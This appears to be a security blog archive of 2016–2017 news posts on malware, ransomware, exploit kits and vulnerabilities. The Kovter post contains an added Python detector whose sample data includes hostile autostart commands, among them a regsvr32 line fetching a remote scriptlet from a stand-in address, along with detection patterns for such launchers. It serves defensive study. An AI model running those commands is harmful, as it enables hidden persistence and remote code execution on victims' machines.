It has been a long time coming, and we are not quite there yet, but Adobe Flash is about to die. The long, slow, drawn-out death of Adobe Flash will continue for another three years yet, with Adobe finally confirming that it will be pulling the plug by December 31, 2020. By then, all updates for Adobe Flash will stop and we will all enter a Flash-free age. Until then, Adobe is committed to working with partners to ensure Flash remains as secure as possible and updates will continue until that time. However, Adobe is already trying to encourage businesses to start switching to other standards such as HTML5. The decision to finally put Flash out of its misery was made because other platforms and technology have “matured enough and are capable enough to provide viable alternatives to the Flash player,” according to Adobe. In 2005, Flash was on 98% of all computers, and even three years ago it was being used by 80% of desktop users on a daily basis. Today, helped in no small part by the serious security flaws in the platform and the switch from PCs to mobile devices, usage has fallen to just 14%. Google is not supporting Flash anymore and has not done so for Android since 2012. Apple has never supported the plug-in on its mobile devices, and Firefox, Chrome, Edge and Safari no longer run Flash content automatically. Even Internet Explorer will disable Flash by default in 2019, ahead of its official death date the following year. Of course, just stopping updates does not mean that Flash will cease to exist. But given the rate at which vulnerabilities in Flash are now being discovered, anyone still using Flash by 2020 will be wide open to attack as soon as the updates stop. However, by then there will be far fewer websites using Flash and fewer devices with the Flash plug-in installed. The Internet will most likely be a safer place without Flash, but what will happen to all the hackers who are currently developing exploits for Flash vulnerabilities? 
They will not retire as well. Instead they will put their efforts into something else. What that is, of course, remains to be seen. Three years may seem like an awfully long time, but there are still many...
by G Hunt |
July 26, 2017 |
Cybersecurity News, Internet Security News
Stantinko malware may only have recently been detected, but it is far from a new malware variant. It has been in use for the past five years, yet has only recently been identified. During the past five years, Stantinko malware has spread to more than 500,000 devices and has been operating silently, adding infected systems to a large botnet, with the majority of infected machines in Russia and Ukraine. The botnet has primarily been used to run a large-scale adware operation. The malware installs the browser extensions Teddy Protection and The Safe Surfing, which appear to users to be legitimate apps that block malicious URLs. These apps are legitimate if downloaded via the Chrome Web Store, but they are not if they are installed by Stantinko. The Stantinko versions contain different code that is used for click fraud and ad injection. ESET reports that additional plugins known to be installed by Stantinko malware include Brute-Force and Search Parser, which are used for Joomla/WordPress brute force attacks and to anonymously search for Joomla/WordPress sites. Remote Administrator is a fully functional backdoor, and Facebook Bot can generate fake likes, create new accounts, or add friends on Facebook, virtually undetected. While click fraud is the primary goal of the attackers, Stantinko malware can perform a wide range of functions, since it includes a loader that enables threat actors to send any code to an infected device via their C2 server and run it. ESET researchers say the malware uses Windows services to perform backdoor activities and brute force attacks on WordPress and Joomla websites. Once access is gained, the attackers sell on the login credentials to other cybercriminal groups, according to ESET. That’s not all. ESET says Stantinko malware could be used to perform any task on an infected host. The malware and botnet have remained undetected for so long due to their ability to adapt to avoid being detected by anti-malware solutions. 
The malware also uses code encryption to avoid detection. Users would be unlikely to realize that anything untoward was happening on their machine. The tasks performed by the malware involve low CPU activity...
by G Hunt |
July 21, 2017 |
Internet Privacy, Internet Security News
UK porn filtering controls are expected to be introduced next year to make it harder for minors to access – accidentally or deliberately – pornographic material over the Internet. The government has proposed a new requirement that will make it mandatory for all sites hosting adult or pornographic content to conduct age verification checks before adult content is displayed. From April next year, a yet-to-be-decided regulator – most likely the British Board of Film Classification – will be able to block websites hosting pornography if they do not conduct checks to ensure visitors are over the age of 18. Blocks are likely to be applied at the ISP level, and the sites could be barred from taking credit card payments from the UK if they do not comply. The change to UK porn filtering controls would mean minors would be prevented from accessing pornographic material. Digital minister Matt Hancock explained the move would mean the “UK will have the most robust internet child protection measures of any country in the world.” While many adult websites ask the user if they are over 18 before content is displayed to prevent accidental access, further controls would be required to verify age. One of the easiest ways to do that is by forcing the visitor to submit their credit card details. In the UK, it is not possible for individuals under the age of 18 to be issued with a credit card. The new UK porn filtering controls have been welcomed by some groups – the National Society for the Prevention of Cruelty to Children (NSPCC) for example – but the move has raised many concerns. Age verification checks are likely to result in the operators of the websites maintaining a database of site users, even individuals who do not pay for access. The database is likely not only to include details supplied in the verification checks, but also profiling and viewing histories. It is possible that large volumes of highly sensitive data could be collected on millions of users. 
Any website that collects sensitive consumer data is a target for hackers. The databases that could be built by adult content providers would be an even bigger target. Not only could information be used for...
by G Hunt |
June 29, 2017 |
Cybersecurity News, Internet Security News
The NotPetya ransomware attacks on Tuesday this week initially looked like another WannaCry-style attack. They used similar NSA exploits to spread infections, ransoms were demanded and, like WannaCry, the attacks rapidly spread around the globe. However, closer inspection of NotPetya ransomware has revealed that all may not be as it first appeared. The purpose of ransomware is to lock files with powerful encryption to prevent files from being accessed. A ransom demand is then issued. Payment of the ransom will see the keys to decrypt the files supplied. Organizations get their files back. The attackers get a big payday. There have been many cases when ransomware has encrypted files, yet the attackers are not capable of supplying the keys. These attacks have tended to be conducted by amateurs, or show that the authors have been sloppy and failed to check that decryption is possible. If attackers do not make good on their promise to supply valid keys to unlock the encryption, word will soon spread on social media and security websites that paying the ransom will not enable organizations to recover their files. That means the campaign will likely not be profitable. Developing a new ransomware variant is not a quick and easy process. It does not make sense for a threat actor to go to all the trouble of developing ransomware and devising a sophisticated multi-vector campaign to spread it, but then forget about the essential elements that make it possible to receive ransom payments. That is, unless the aim of the campaign is not to make money. In the case of the recent NotPetya ransomware attacks, the actors behind the campaign appear to have made some serious errors if making money was their aim. First, the ransom demand was only $300 per infected machine, which is well below the current average payment demanded by ransomware gangs. As for the errors, they were numerous. Petya ransomware, which NotPetya closely resembles, provides the victim with an installation ID. 
That ID is unique to the victim. It is used to determine who has paid the ransom. In the latest attacks, the IDs consisted entirely of random characters. As Kaspersky Lab explained, that means it is...
by G Hunt |
June 9, 2017 |
Cybersecurity News, Internet Security News
Hackers have been phishing for domain credentials and using the logins to gain access to websites and create malicious subdomains – a process called domain shadowing – and using those subdomains as gates that redirect users to sites loaded with the RIG exploit kit. The RIG exploit kit probes for vulnerabilities in web browsers and exploits flaws to download malware. Those malware downloads usually occur silently without the users’ knowledge. All that is required for infection is an out-of-date browser or plugin and for the victim to be directed to a website hosting the exploit kit. RIG has primarily been used to download banking Trojans and Cerber ransomware. While use of the exploit kit is nowhere near the level of Angler prior to its demise, the RIG exploit kit is now the leading EK used by cybercriminals and activity has increased sharply in recent months. Cybercriminals have been generating traffic to the malicious subdomains using malvertising campaigns – malicious adverts sneaked onto third party ad networks. Those ads are then syndicated across a wide range of high traffic websites and redirect visitors to the malicious subdomains. Other techniques used to drive traffic to the sites include malicious Chrome popups and iframes inserted into compromised WordPress, Drupal and Joomla! websites. Tens of thousands of subdomains have been created on legitimate websites that have been compromised by hackers. Cybercriminals are understood to have been obtaining login credentials to websites using malware. The subdomains were mostly created on websites hosted by GoDaddy. The domain registrar has been working with RSA Security and independent security researchers to identify the compromised websites and take down the subdomains. In total, around 40,000 subdomains were taken down in May. 
While this takedown is certainly good news, it is unclear how much of an effect it will have on RIG EK operations, as little is known about the RIG infrastructure and the total number of websites that have had malicious subdomains added. However, RSA Security says these takedowns have resulted in “a significant loss of capabilities to RIG operations”. RSA and GoDaddy are working to...
by G Hunt |
May 24, 2017 |
Cybersecurity News, Internet Security News
The Terror exploit kit is a relative newcomer to the EK scene, yet it is evolving rapidly. Since the demise of Angler, exploit kit activity has waned. However, the threat from new exploit kits such as Terror is growing. Exploit kits probe for vulnerabilities in browsers or plugins. When an individual is directed to a website hosting an exploit kit, the EK searches for exploitable vulnerabilities. When exploitable vulnerabilities are discovered, the EK silently downloads malware or ransomware. Exploit kits can be hosted on compromised websites or sites run by the attackers. Cybercriminals use a variety of techniques to get traffic to the sites. Links can be sent via spam email or via instant messaging services and social media sites. Malicious advertisements – termed malvertising – can be hosted on third party ad networks. Those ads are then served in sidebars on any number of legitimate, high traffic websites. Web redirects are also used to divert traffic to malicious sites hosting exploit kits. If an individual with out-of-date plugins or an older browser version visits such a malicious site, and an exploit has been loaded to the kit for a vulnerability in the browser, a malicious payload can be silently downloaded onto the user’s device. In recent months, spam email has become the main attack vector used by cybercriminals. However, exploit kit activity appears to be increasing, with the Terror exploit kit fast evolving into a significant threat. The Terror exploit kit previously used a ‘carpet-bombing’ approach, sending a wide range of exploits at the end user’s system in the hope that one would be effective. Such an approach is not particularly sophisticated. However, Terror has now been updated and attacks can be tailored based on the user’s browser environment. Exploits that have a high probability of being successful are then delivered. 
The Terror exploit kit can now determine which exploits to drop based on the victim’s browser version, the plugins that have been installed, or patch level, according to the researchers who discovered the update. Protecting against exploit kits requires browsers and plugins to be kept 100% up to date and vulnerability free, which...
by G Hunt |
May 18, 2017 |
Cybersecurity News, Internet Security News
The version of WannaCry ransomware used in Friday’s attacks has been blocked, although new WannaCry ransomware variants have been detected.
U.S. Escapes WannaCry Relatively Unscathed
The total number of computers infected with WannaCry ransomware is now believed to be around 300,000, although the United States escaped relatively unscathed, according to the U.S. Department of Homeland Security (DHS). While it is still unclear exactly how many U.S. organizations have been affected, fewer than 10 organizations have reported a WannaCry ransomware attack to DHS. The ransomware attacks have now stopped, although organizations that have experienced an infection that has resulted in files being encrypted must recover those files from a backup, accept data loss, or pay the attackers for the decryption keys. The attackers have so far made around $81,000 from their ransomware campaign, according to @actual_ransom. With a ransom payment of $300 per infected device, many payments have already been made; however, given the number of devices locked by the ransomware, most victims are not paying the attackers to unlock their files. WannaCry ransomware encryptions were stopped when a security researcher (MalwareTech) from the UK discovered a kill switch while investigating the worm code. In an apparent effort to avoid running in a sandbox or virtual environment, the ransomware performed a check on a nonsense domain. If a connection to that domain was successful, the ransomware would exit. If the connection to the unregistered domain failed, the ransomware would proceed and encrypt files. By registering that domain, MalwareTech stopped further encryptions. 
WannaCry Victims Appear to Have Been Contacted by the Attackers
In an apparent effort to increase the profits from the campaign, the attackers have generated pop-up messages on affected computers saying, “I have already sent decryption keys to many customers who had sent me the correct amounts of bitcoin, and I guarantee the decryptions for such honest customers.” While this message could indicate the attacker has access to infected computers, it is possible that the message was pre-programmed to appear. Paying ransom demands only...
by G Hunt |
May 5, 2017 |
Cybersecurity News, Internet Security News
Pew Research has recently published the results of a study that set out to test cybersecurity awareness in America and find out more about the risks individuals are unwittingly taking when venturing online. The study was conducted on 1,055 adult Americans, who were each asked 13 cybersecurity questions of varying difficulty. Questions included what HTTPS means, what two-factor authentication is, what private browsing means, and the level of protection a VPN offers on insecure WiFi networks. The study showed that cybersecurity awareness in America is poor and consumers are potentially taking major risks online. While all 13 questions should have been answered correctly by ‘security aware’ individuals, only 1% were able to answer all questions correctly. A substantial majority of adult Americans that took the questionnaire were only able to answer two of the questions correctly. The median was 5 correct answers out of 13, the mean 5.5, and only 20% of participants were able to answer more than 8 questions correctly. Three quarters of participants were able to identify the most secure password in a list, and 73% of respondents were aware that public WiFi networks carry a major risk and should not be used for sensitive activities such as online banking, even if the WiFi network requires the use of a password. However, cybersecurity awareness was much worse for all other areas tested by the survey. Just over half of respondents were able to correctly identify what a phishing attack involves, which is a particularly worrying result considering how widespread the use of phishing is. Ransomware has been heavily reported in the press and attacks on businesses have soared, yet fewer than half of survey participants were able to correctly identify what ransomware is, and only 46% knew that email is not encrypted by default. 
Worryingly, only 33% of participants were aware that HTTPS meant traffic was encrypted, suggesting many are entering credit card information into unencrypted websites. Only one in ten participants were able to correctly identify multi-factor authentication, with 71% thinking CAPTCHA was a form of multi-factor authentication rather than...
by G Hunt |
April 21, 2017 |
Cybersecurity News, Internet Security News
McAfee has issued a new threat report detailing 2016 malware trends. The decline in new malware samples in the final quarter of 2016 does not suggest that 2017 will see a continued fall in new malware, but the opposite, according to McAfee Labs. 2016 malware trends follow a similar pattern to 2015. The first quarter saw large volumes of new malware discovered, followed by a steady decline over the next three quarters. The same trend was identified in 2015. Far from that decline continuing into 2017, the first quarter figures – which will not be made available until the summer – are likely to follow a similar trend and involve a massive increase in malware numbers in the first three months of 2017. Further, there has been a steady increase in the number of new malware samples detected year on year, from around 400 million per quarter in 2015 to more than 600 million per quarter in 2016. If that trend continues into 2017, this year is likely to see around 800,000 new malware samples detected each quarter on average. McAfee predicts that there will be around 17 million malware samples by the end of this year. McAfee reports that ransomware increased steadily over the course of 2016, starting the year with around 6 million samples and finishing the year with over 9 million detected samples. However, the final quarter of 2016 saw a sharp drop in ransomware due to a decline in generic ransomware detections and a fall in the use of Locky. There have been relatively few new Mac OS malware samples detected over the past two years, although Q3 2016 saw new Mac OS malware increase from around 10,000 to 50,000, with a massive rise to around 320,000 new samples in the final quarter of 2016. By the end of 2016, the total number of Mac OS malware samples rose to more than 450,000, from around 50,000 at the end of Q4 2015. The increase mostly involved bundled adware. 
The switch from exploit kits to email as the main attack vector is evident from the figures for new macro malware, with a sharp rise in Q2 2016 and a continued rise in Q3. In Q1, there were around 60,000 detections; by Q3 that figure had risen to more than 200,000. The public sector was most affected by security breaches...
by G Hunt |
March 22, 2017 |
Cybersecurity News, Internet Security News
Educational institutions have been warned about Moodle security flaws that could allow cybercriminals to attack web servers, gain administrative privileges and run malicious code. Many educational institutions use the Moodle platform for their e-learning websites. The platform allows students to access interactive online courses. There are almost 80,000 websites that use the open source platform, many of which are operated by schools, colleges and universities. On Monday this week, security researcher Netanel Rubin disclosed a vulnerability – tracked as CVE-2017-2641 – that could be exploited to run malicious PHP code on an unpatched Moodle server. He pointed out on his blog that the problem does not lie with a single critical security flaw, but with a number of smaller vulnerabilities which can be exploited when combined. An attacker could exploit the Moodle security flaws to create hidden administrative accounts; however, in order to exploit the flaws, the attacker would need to have an account on the platform. It does not matter what type of account the attacker has, provided it is not a guest account. Since more than 100 million individuals log onto the websites to access courses, obtaining a user account would not pose too much of a problem. The Moodle security flaws could be exploited by attackers to install backdoors in the system, allowing persistent access to data stored on a Moodle server, and there is data aplenty. Highly sensitive information about students is stored on the system, including personal information, grades and test data. According to Rubin, the Moodle security flaws affect all versions of the platform tested, including “3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions.” Rubin pointed out that such a large system – Moodle contains more than 2 million lines of PHP code – will almost inevitably have numerous vulnerabilities. 
In this case, the code has been written by multiple authors which has led to logical flaws being introduced. The problem comes from having too much code, too many developers and a lack of documentation. That is a problem for any system of this size, not just...
by G Hunt |
March 15, 2017 |
Cybersecurity News, Internet Security News
2017 has already seen numerous cyberattacks on educational institutions. 2017 has started particularly badly for the education sector and there is no sign of the cyberattacks abating any time soon. But why is the education sector being so heavily targeted by hackers, cybercriminals, and scammers? It is easy to see why cyberattacks on financial institutions occur. There are substantial funds to be plundered. Cyberattacks on healthcare organizations are also common. Those organizations hold vast quantities of data; data that can be sold for big bucks on the black market and used for all manner of fraud: medical fraud, identity theft, tax fraud, and insurance fraud, for example. However, the education sector is similarly being targeted. K12 schools, colleges, and universities have all been attacked and those attacks have soared in 2017. The list of educational institutions that have reported cyberattacks in 2017 is long. Barely a day goes by without another educational institution being added to the list. Many of the cyberattacks on educational institutions are random, but it is becoming increasingly clear that the education sector is being targeted. There are many reasons why the attacks have soared in recent months. Educational institutions hold vast quantities of valuable data, they have considerable computer resources that can be used by cybercriminals, and in contrast to other industry sectors, educational institutions are not as heavily regulated when it comes to cybersecurity protections. Defenses are relatively poor and educational organizations tend to have relatively few IT staff compared to the corporate sector. In short, the potential profits from cyberattacks on educational institutions are high and attacks are relatively easy to perform. For cybercriminals that is an excellent combination.
What Data are Cybercriminals Attempting to Steal?
K12 school systems have been targeted by criminals in order to gain access to student data. 
Social Security numbers of minors are extremely valuable. Dates of birth and Social Security numbers can be used for identity theft and fraud and in the case of minors, fraud is less likely to be identified quickly. Minors...
by G Hunt |
March 14, 2017 |
Cybersecurity Advice, Internet Security News
At a recent cybersecurity conference, Director of the FBI James B. Comey gave valuable ransomware advice for healthcare providers to help them tackle the growing threat of attack. Comey confirmed that ransomware is now the biggest cybersecurity threat for the healthcare industry. Healthcare providers must be prepared for an attack and be able to respond quickly to limit the harm caused. Ransomware is used to encrypt files and databases to prevent the victim from accessing essential data. Since healthcare providers need access to patient health information in order to provide medical services, they are being extensively targeted. If data access is essential, victims are more likely to pay ransom demands. However, Comey explained that ransoms should never be paid. If a ransom is paid, this only encourages cybercriminals to attack more businesses. The payment of a ransom sends a message to other cybercriminals that the attacks are profitable. Ransomware can be sent randomly via spam email or distributed by malicious websites. Cybercriminals also install ransomware once access to a computer system has been gained and data have been exfiltrated. Tackling the problem involves implementing a range of cybersecurity defenses to prevent attacks, and ensuring data can be recovered and business processes can continue if ransomware is installed. In the case of the latter, data backups are essential. All critical data should be backed up on a daily basis at a minimum. Data backups can also be encrypted by ransomware, so it is essential that backup devices are not left connected to computers or servers. Data should ideally also be backed up in the cloud. One of the best pieces of ransomware advice for healthcare providers is to prepare for an attack now. Healthcare organizations should not wait until a ransomware infection occurs to decide how to respond. 
Not only should policies be developed that can be implemented immediately following a ransomware attack, business continuity plans must be tested prior to a disaster occurring. The same goes for backups. Many organizations have been attacked with ransomware only to discover that they have been unable...
by G Hunt |
February 23, 2017 |
Cybersecurity News, Internet Security News
A security researcher has discovered a new Google Chrome scam that infects victims’ computers with malware. In contrast to many malware-downloading scams, the new Google Chrome scam is highly convincing and is certain to result in many malware infections. Hackers have installed malicious JavaScript on a number of compromised WordPress websites. The JavaScript modifies the text on a compromised webpage when it is visited using the Google Chrome browser. The text on the website appears as if Google Chrome cannot read the font, with the characters on the site replaced with random fonts and symbols. A popup appears on screen informing the visitor that “the ‘HoeflerText’ font wasn’t found” by Google Chrome. The visitor is told that the webpage they are trying to view cannot be displayed correctly as a result. Visitors are prompted to update their Chrome browser to include the new font by downloading a “Chrome Font Pack.” The Google Chrome scam is convincing. The popup uses the Chrome logo and looks official, with colors and branding that Google would use on its popup windows. The shading used for the “Update” button on the popup window is also accurately reproduced. Furthermore, HoeflerText is a real font. If the user opens a new tab in their browser and searches Google for the font, they will discover the font is real, making the Google Chrome scam seem entirely plausible. Clicking the update button will trigger a download of the update file – ChromeFontv7.5.1.exe – which is an executable containing the malware. While attempting to run the executable would normally result in an anti-virus warning being displayed, relatively few anti-virus products are detecting the ChromeFontv7.5.1.exe file as malicious. VirusTotal shows that just 9 out of 59 AV products identify the file as malicious. The Google Chrome scam was uncovered by NeoSmart Technologies researcher Mahmoud Al-Qudsi. 
He reports that while the Google Chrome scam is highly convincing, there are two signs that the update is not real. First, regardless of the version of Chrome used, the popup says the user has Chrome version 53. The second sign of the scam is the popup says the update file is called...
by G Hunt |
January 20, 2017 |
Cybersecurity Advice, Internet Security News
There is an important reason why the use of web filters in libraries is increasing. The cost of providing computers with Internet access to patrons is not inconsiderable, yet in order to qualify for discounts under the E-Rate program, libraries must implement a web filter to comply with CIPA regulations. Libraries must use the web filter to block obscene images (pornography), images of child abuse, and any other graphics that could cause minors to come to harm. However, there is another reason why the use of web filters in libraries is important. This has been clearly demonstrated this week in St. Louis, MO.
Web Filters in Libraries are Not Only About Internet Control
This week, every computer in the St. Louis Public Library System was taken out of action. Visitors were still able to visit the library and use the books, but do little else. All book borrowing stopped, since it is not possible for library staff to log borrowing on the checkout system. Patrons have also been prevented from gaining access to the Internet. Even the email system has been locked and taken out of action. What kind of computer malfunction causes the entire network of computers to stop working? The answer is ransomware. Ransomware is malicious software that has been developed with one sole purpose: to encrypt system and data files to prevent access. Once downloaded, ransomware locks files with powerful encryption, preventing files from being accessed. The attacker then sends a ransom demand offering the unique keys to decrypt files in exchange for payment. Typically, attackers demand $500 in an anonymous currency such as Bitcoin to unlock each computer that has been attacked. In the case of the St. Louis Public Library system, the ransom demand was $35,000. All 700 of the library system’s computers – across 16 locations – were attacked and encrypted. Some ransomware variants also act as information stealers. 
Fortunately for the library, its inventory was unaffected and payment card information and other personal information of patrons were not stolen. The St. Louis Public Library system will not be paying the extortionate ransom demand. It has instead opted for the only...
by G Hunt |
November 24, 2016 |
Cybersecurity News, Internet Security News
In the past few days, Facebook Messenger Locky ransomware attacks have been discovered, exploit activity has increased, and malicious spam email volume has increased. Organizations now need to defend against a wide range of attack vectors.
2016 – The Year of Ransomware
2016 has seen an explosion in the use of ransomware by cybercriminals and there is no sign of that changing in the near future. More than 200 ransomware families have now been identified, one of the most dangerous being Locky. Locky ransomware was first discovered in February this year, but it has fast become one of the most prolific ransomware variants and has infected thousands of computers. No organization is immune to attack, although the gang behind the infections has been extensively targeting healthcare organizations. A number of U.S. healthcare providers have been forced to pay a ransom demand to recover their data. Rather than cybercriminals having to break through company defenses to gain access to data, then exfiltrate files, and sell those data on the black market – a process that can take weeks before payment is received – ransomware is a quick and easy revenue generator. Payments are made within a few days of infection, as many companies cannot continue to function without access to their data. It is not even necessary for cybercriminals to develop their own ransomware. The malicious file-encrypting software can be ‘hired’ from the authors. By using ransomware-as-a-service, anyone with an Internet connection could run a ransomware campaign. Little skill is needed and attacks result in fast payment. It is therefore no surprise that the file-encrypting software has become so popular. Infection can occur via malicious adverts, exploit kits, or via spam email. All of those infection vectors allow the attackers to bypass traditional cybersecurity defenses such as firewalls. Some headway has been made by security researchers, and decryptors have been developed for some ransomware variants. 
Wildfire, Chimera, Shade, TeslaCrypt, and CoinVault have all been cracked. However, Locky has so far resisted security researchers’ efforts to crack it. The authors of the crypto-ransomware are...
by G Hunt |
July 8, 2016 |
Cybersecurity News, Internet Security News
If you want to keep your computers and network protected, you should ensure that browsers are patched as soon as updates are made available. However, end users who believe they are taking action to keep their computers secure may be fooled into installing fake Firefox updates.
Fake Firefox Updates Used to Install the Kovter Trojan
Fake Firefox updates are being used by the gang behind the Kovter Trojan. A new version of the fileless malware has been identified recently, and it is infecting users by posing as a Firefox update. The cybercriminal gang behind Kovter frequently tweaks the malware and comes up with new ways of infecting end users. Kovter is a particular worry as it can be very difficult to detect. Being fileless, it leaves no executable on disk for file-based scanners to find: the malware resides only in memory, and a Windows registry entry ensures it is reloaded into memory each time the computer is rebooted. Kovter can perform a range of malicious activities, such as redirecting users to malicious websites, performing click fraud, downloading other malware, and now also encrypting files. The latest variant, discovered by Check Point, also has ransomware capabilities. When users visit a malicious or compromised website they are presented with a fake Firefox update and urged to download the latest version to keep their computers secure. Researchers at Barkly discovered that the gang behind the latest Kovter campaign is using a legitimate code-signing certificate to fool antivirus engines. The certificate was issued by Comodo, although it has since been revoked. Antivirus engines are also now being updated to detect the malware and block its download.
Preventing Drive-by Malware Downloads
There are a number of steps that can be taken to prevent drive-by downloads of malware such as Kovter. Policies should be implemented that prohibit end users from performing software updates themselves; updates should be left to the IT team to handle.
Patch management policies should be developed and implemented to make sure that when software updates and patches are issued, they are installed promptly or preferably automatically. Browsers should never be updated outside the normal update process. To...
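Because Kovter leaves nothing on disk, the place to look for it is the autostart entry that reloads it from the registry on every boot. The script below is an added example (not code from the TitanHQ article or from the Barkly and Check Point research it cites): it runs a handful of heuristics over a constructed export of Run-key values and flags the shapes a registry-resident launcher typically takes, such as a script host started with an inline javascript: URL that reads its real payload back out of the registry. The sample entries, value names and patterns are the author's assumptions and are not a signature for any particular Kovter build.

```python
"""Flag fileless-style autostart entries in a Windows Run-key export.

Added example (not from the TitanHQ article or the Barkly/Check Point
research it cites). Kovter-style fileless malware keeps its payload in the
registry and uses an autostart entry to relaunch a script host that reads it
back into memory on every boot. The entries below are constructed for the
example; the indicator patterns are generic heuristics for registry-resident
launchers, not a signature for any one Kovter build.
"""
import re

# Constructed sample of HKCU\...\Run values as (value_name, command_line).
SAMPLE_RUN_VALUES = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("SecurityHealth", r"C:\Windows\system32\SecurityHealthSystray.exe"),
    ("8f2a1c", "mshta.exe \"javascript:v=new ActiveXObject('WScript.Shell');"
               "eval(v.RegRead('HKCU\\\\software\\\\x9k2\\\\p1'));close();\""),
    ("updater", r"powershell.exe -NoP -W Hidden -EncodedCommand SQBFAFgAIAAo"),
    ("svc", r"regsvr32.exe /s /n /u /i:http://198.51.100.7/a.sct scrobj.dll"),
]

# Each heuristic: (label, compiled regex over the command line).
INDICATORS = [
    ("script host launched with inline javascript:",
     re.compile(r"\b(mshta|rundll32)(\.exe)?\b.*javascript:", re.I)),
    ("script host evaluates a registry-stored payload",
     re.compile(r"\.RegRead\(|Get-ItemProperty", re.I)),
    ("powershell hidden window / encoded command",
     re.compile(r"\bpowershell(\.exe)?\b.*(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\b)", re.I)),
    ("regsvr32 loading a remote scriptlet",
     re.compile(r"\bregsvr32(\.exe)?\b.*/i:https?://", re.I)),
    ("wscript/cscript forced to jscript engine",
     re.compile(r"\b[wc]script(\.exe)?\b.*//e:jscript", re.I)),
]


def classify_run_value(name, command):
    """Return the list of indicator labels that match one autostart entry."""
    return [label for label, rx in INDICATORS if rx.search(command)]


def suspicious_entries(run_values):
    """Return {value_name: [labels]} for every entry that trips an indicator."""
    hits = {}
    for name, command in run_values:
        labels = classify_run_value(name, command)
        if labels:
            hits[name] = labels
    return hits


if __name__ == "__main__":
    for name, labels in suspicious_entries(SAMPLE_RUN_VALUES).items():
        print(f"{name}: {'; '.join(labels)}")
```

On a real host the input would come from an export of the HKCU and HKLM Run and RunOnce keys (for example the output of reg.exe query) rather than the constructed list; the heuristics deliberately key on the launcher, not on the payload, because the payload is the part the attackers change most often.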
by G Hunt |
June 30, 2016 |
Cybersecurity News, Internet Security News
Mobile ransomware may not be nearly as prevalent as its PC counterpart, but attacks on mobile devices are on the rise according to a new report issued by anti-virus firm Kaspersky Lab. Kaspersky Lab assessed thwarted ransomware attacks on mobile users over a period of two years and saw the share of attacks involving ransomware more than double, signifying a worrying new trend. Between 2014 and 2015, 2.04% of malware attacks on mobile users involved ransomware. Between 2015 and 2016, the percentage rose to 4.63%. During that period, 136,532 attacks took place. Kaspersky Lab noted that the ransomware used to infect mobile devices differs considerably from the strains used to infect PC users. While Locky, CryptXXX, and RAA are now the main threats affecting PCs, the main mobile ransomware strains currently being used are Fusob, Small, Svpeng, and Pletor. Mobile ransomware tends not to use encryption to lock files; instead, the malicious software blocks users from accessing their device. Oftentimes this is achieved with a simple HTML overlay. Encryption is more effective on PCs because many users fail to back up their data, or when they do they leave their backup devices connected. Many strains of PC ransomware are able to delete backup files or encrypt them, leaving end users with no alternative but to pay the ransom or lose their data forever. Many mobile users automatically back up their data in the cloud, so if data is ever lost or encrypted, files can easily be recovered. However, an overlay prevents the user from being able to access their files from the device at all. With mobile devices, victims cannot simply take out a hard drive, plug it into another machine, and manually remove malicious files. If an infection takes place, users either have to pay the ransom or replace their device. Provided the ransom is lower than the cost of a replacement, many users will end up paying. Without the need for encryption, the development of mobile ransomware is considerably cheaper.
The ransoms that can be demanded may be lower than for PC infections, but campaigns can be highly profitable for cybercriminals. Criminal gangs are also using an affiliate model to spread infections. There is usually no...
by G Hunt |
June 29, 2016 |
Cybersecurity News, Internet Security News
A new threat has recently been discovered by security researchers at PhishMe: Bart ransomware. The new ransomware variant is not as sophisticated as Locky and Samsa, but it is still highly effective and poses a risk to businesses. Should end users be fooled into opening the spam emails, file recovery will only be possible from backups unless the ransom demand is paid.
Bart Ransomware Locks Files in Password-Protected ZIP Files
Bart ransomware bears a number of similarities to other ransomware variants that have been discovered in recent months. If installed on a device, media files, photos, documents, spreadsheets, databases, and a host of other files are located and encrypted. Bart also encrypts .n64 ROM files, which was previously unique to Locky ransomware. Bart is delivered using the same Dridex botnet that was used to deliver Locky, and it uses a payment interface that looks very similar to Locky’s. However, there are notable differences from Locky and other ransomware variants. Bart demands a particularly high payment from its victims. Rather than a demand of 0.5 Bitcoin, Bart asks for 3 Bitcoin per infected machine – approximately $1,988 per device at the time of writing. There are also notable differences in the method used to lock files. Bart does not use public key cryptography. Files are added to ZIP archives which are then password protected; to unzip them a password must be supplied, and that password is only given to the victim if the sizeable ransom is paid. Bart also does not use the typical command and control infrastructure. Most new ransomware variants communicate with the attackers’ command and control server before files are encrypted, but that does not appear to happen with Bart, which means it can encrypt files even on machines that cannot reach the Internet.
New Ransomware Variant Delivered via Spam Emails
The campaign uses spam emails to deliver malicious JavaScript files, which are disguised as image files. End users may be fooled into opening the attachments in the belief they are simply images.
However, if the attachments are opened, the JavaScript is executed and RockLoader is downloaded. RockLoader installs Bart ransomware and is also capable of downloading a variety of other malware. The...
by G Hunt |
June 21, 2016 |
Cybersecurity News, Internet Security News
Security researchers have uncovered an entirely JavaScript-based ransomware variant that not only encrypts files on infected devices with AES, but also delivers the Pony info-stealer. Pony is used to harvest users’ passwords and login credentials to launch further attacks. This means that while a ransom may have to be paid to regain access to important files, the victim is also highly likely to suffer further losses. JavaScript-based malware is nothing new. Criminals have been using JavaScript files to infect devices with ransomware for some time, but previously JavaScript has most commonly served as a downloader that fetches the ransomware executable. The latest threat is written exclusively in JavaScript and requires no additional downloads.
RAA Ransomware Delivered via Spam Email
The attack starts with a spam email containing a malicious attachment. The attached file appears to be a document, but it is actually a malicious JavaScript file. Opening the file results in a fake Word document being created in the user’s My Documents folder. That file is then opened automatically, leading the victim to believe that the attachment is corrupted, while the malicious process keeps running in the background. The malicious JavaScript file – dubbed RAA ransomware – does not implement any cryptographic functions of its own; instead it embeds the CryptoJS library to encrypt files with AES. First, all drives – local, network, and removable – are scanned for specific file extensions, including documents and spreadsheets (DOC, RTF, XLS, CSV, PDF), compressed files (ZIP, RAR), image files (JPG, PSD, PNG, DWG, CDR, CD), database files (DBF, MDF), and LCD files.
Once the targeted files are identified, the JavaScript-based ransomware encrypts them using AES and renames them with the “.locked” extension. To make it harder for victims to recover from the infection without paying the ransom, RAA ransomware also disables the Windows Volume Shadow Copy Service (VSS) and deletes all existing shadow copies. Finally, files are created on the Desktop which detail how much must be paid to obtain the decryption key and instructions on how payment must be made. JavaScript...
